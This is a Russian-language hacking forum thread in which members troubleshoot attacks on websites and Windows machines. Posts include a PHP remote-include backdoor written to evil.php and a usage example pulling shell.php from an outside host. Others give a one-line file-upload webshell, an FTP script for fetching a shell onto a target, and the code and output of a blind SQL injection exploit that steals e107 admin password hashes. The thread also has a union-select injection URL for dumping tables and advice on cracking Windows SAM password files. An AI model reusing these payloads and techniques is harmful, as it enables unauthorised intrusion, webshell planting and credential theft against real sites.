Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    >echo "<?include($_GET[w])?>" > /www/evil.php
    >type dir/file.php
    никак
     
  2. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Привет всем!
    есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
    вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
    Вот что выдаёт:
    Я так понимаю, тут написано, что нужно увеличить задержку чего-то. А чего и как - хз. И можно ли вообще это как-то увеличить?
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    my $benchmark = 1000000; - наверное тут надо циферьку побольше поставить

    или тупо во это вырезать:

    Code:
    if($bdelay - $ndelay < 4)
    {
        print STDOUT "[-] Benchmarck delay too small compared to normal delay, increase it.\n";
        exit ();
    }
    
     
    1 person likes this.
  4. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    @diznt
    я же тебе уже написал в прошлой теме, что так должно быть: при выполнении команды ftp пользователю предлагается ввести команды в консоли ftp. Я же писал выполни ftp /? узнаешь список команд. Если ты такой ленивый, то вот пример скачивания файла с удаленного ftp:
    Code:
    open ftp.someserver.com
    user username password
    
    ascii
    cd /htdocs
    get s.php
    bye
    затем сохраняешь это в файл ftp.txt и выполняешь команду в cmd:
    ftp -n -s:C:\ftp.txt
    В итоге ты скачаешь файл s.php с ftp-сервера под учетной записью пользователя username с паролем password

    Или используй tftp, скачивай сервер по ссылке, которую я уже давал и запускай на своем компе, указав папку с доступными для скачивания файлами.
     
  5. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    тогда сплоит работать не будет, время задержки сервера должно быть достаточно существенным, чтобы скрипт мог отличить правильный и неправильный запрос
     
  6. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    а что это такое

    <?include($_GET[w])?>

    и как это использовать???))
     
  7. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    php.su
     
  8. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    diznt, как сказал слип - php.su конечно же поможет .. ну а вообще - инклудь шелл и будет тебе радость :D
     
  9. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    есть язык программирования php.
    в нем есть код.
    в этом коде можно написать include($_GET[w]) и теперь при обращении к странице site.ru/index.php?w=http://ya.ru/shell.php мы можем использовать код из файла shell.php. Инклуд нужен, чтобы встраивать в код скрипта код из другого файла. как-то так) если не понял-пиши)
     
  10. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    AFoST неа не пашет
    пишу ***.com/test.php?w=http://z0u4.narod.ru/1.php
    Не помогает... (даже если выбрать хост с поддержкой php)
    Помогайте)
     
  11. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    инклудь тхт а не пхп...
     
  12. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    DimOnOID не помогает... К сожелению покачто не могу дать ресурс где я все это делаю
     
  13. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    глянь phpinfo() возможно отключен url_include; проверь url_fopen=on/off?
    или попробуй так:
    Code:
    <form enctype=multipart/form-data method=post><input type=file name=x><input type=submit></form><?$f=$_FILES[x];copy($f[tmp_name],$f[name]);?>
     
  14. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
    Code:
    [+] e107 <= 0.7.13 Blind SQL Injection
    [+] Admin/User's Password Retrieve Exploit
    [+] Coded by __GiReX__
    
    [+] Logged in with your account..
    [+] Checking database delay, please wait..
    
    [+] Normal delay: 1
    [+] Benchmark delay: 13
    
    [+] Victim password: f
    
    [-] Exploit mistake: please re-check benchmark
    Я так понимаю, загвоздка где-то здесь:
    Code:
    for(my $j = 1; $j <= 32; $j++)
    {  
        foreach $char(@cset)
        {    
            info(chr($char), $hash, "password");
            
            my ($pre_time, $post_time) = time();
            $rv = check_char($char, $j, "user_password");    
            $post_time = time();
        
                 if($rv and ($post_time - $pre_time) > ($ndelay + 3))
                 {        
                     $hash .= chr($char);
                     last;
                 }
        }
        
        last if $j != length($hash);
    }    
    
    if(not defined $hash or length($hash) != 32)
    {
        print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
        exit;
    }
    Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
    Code:
    ...
    [+] Logged in with your account..
    [+] Checking database delay, please wait..
    
    [+] Normal delay: 1
    [+] Benchmark delay: 13
    
    [+] Victim password: f
    
    [+] You can try to login with this cookie:
    [+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
    
    length(d41d8cd98f00b204e9800998ecf8427e) = 32

    Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
    Так что же делать? как заставить скрипт работать? подскажите плиз, я в программировании не бум-бум.
     
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Интересует как узнать пароль админа...
    Имееться папка WINDOWS при себе
     
  16. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    иши сам файл а потом бруть саминсайдом
     
  17. none222

    none222 Guest

    Reputations:
    0
    http://ru.wikipedia.org/wiki/SAM
     
    2 people like this.
  18. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Братцы, выручайте!!!!

    Есть некий сайт со sql inj, и вот такой запрос

    http://www.site.com/list.php?cat=-41+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3a3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10),4,5,6,7,8,9,10+from+table_name/*

    Все данные из таблицы table_name,все которые в ней есть, сразу выводятся на страницу.
    Но во многих значение колонки summ10 пустое. Просто после данных из summ9 идёт :: и пусто.
    Внимание, вопрос :)
    Как вывести только те данные, в которых значение summ10 не пустое? (их мало, но они есть). Каким запросом?

    Выручайте, очень на вас расчитываю.
     
    #3578 Imperou$, 10 Nov 2008
    Last edited: 10 Nov 2008
  19. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    WHERE summ10 <> ""
     
    1 person likes this.
  20. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    [Raz0r]
    Извини, немного не понял.
    Это будет выглядеть так?
    ...+union+select+1,2,concat(summ1,0x3a3a,summ2,0x3a 3a,summ3,0x3a3a,summ4,0x3a3a,summ5,0x3a3a,summ6,0x 3a3a,summ7,0x3a3a,summ8,0x3a3a,summ9,0x3a3a,summ10 ),4,5,6,7,8,9,10+from+table_name+where+summ10=.../*
    ?
    Покажи пожалуйста на примере запроса.
    И ещё, summ10 имеет разные значения, разной длинны.
    Например
    1435
    233
    1645
    и т.д.
    Если использовать +where+summ10=.../*
    то ведь необходимо указывать значение summ10.
     
Thread Status:
Not open for further replies.